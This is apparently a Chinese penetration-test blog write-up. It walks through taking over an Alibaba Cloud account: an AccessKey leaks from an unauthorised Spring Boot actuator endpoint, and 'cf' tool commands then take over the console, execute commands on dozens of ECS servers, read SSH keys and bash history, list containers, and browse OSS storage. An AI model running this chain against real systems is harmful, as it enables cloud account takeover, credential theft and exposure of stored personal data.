一次简单的”云”上野战记录
0x00 Springboot actuator开局
打点发现某系统存在springboot actuator未授权访问,看到一个神奇的oss接口,springboot未授权玩了这么多年,也是第一次碰到云的响应:
直接访问,AK到手:
0x01 一键接管?
配置AK:
cf config
查看当前AK的权限:
cf alibaba perm
一键接管控制台:
cf alibaba console
云上自带的扫描,可以看到有好多漏洞都未修复,相当于一堆靶场啊:
0x02 ECS利用
列出ECS:
cf alibaba ecs ls
46台服务器到手(有几个stoped),直接命令三连,截图留证:
cf alibaba ecs exec -b
然后就是翻翻实例,看看能不能发现什么有用的信息。
root权限,直接开始捡漏,看到了公私钥,又一波免密登录机器到手:
cf alibaba ecs exec -i 实例ID -c "ls ~/.ssh"
cf alibaba ecs exec -i 实例ID -c "ls ~/.bash_history"
熟悉的味道,碰到了久违的k8s,拿下拿下:
cf alibaba ecs exec -i 实例ID -c "docker ps -a"
再看看数据库吧:
0x03 OSS利用
内容比较多,直接oss浏览器连接查看,太多了,懒得翻了,一般会存一些照片(证件照?),备份库之类的: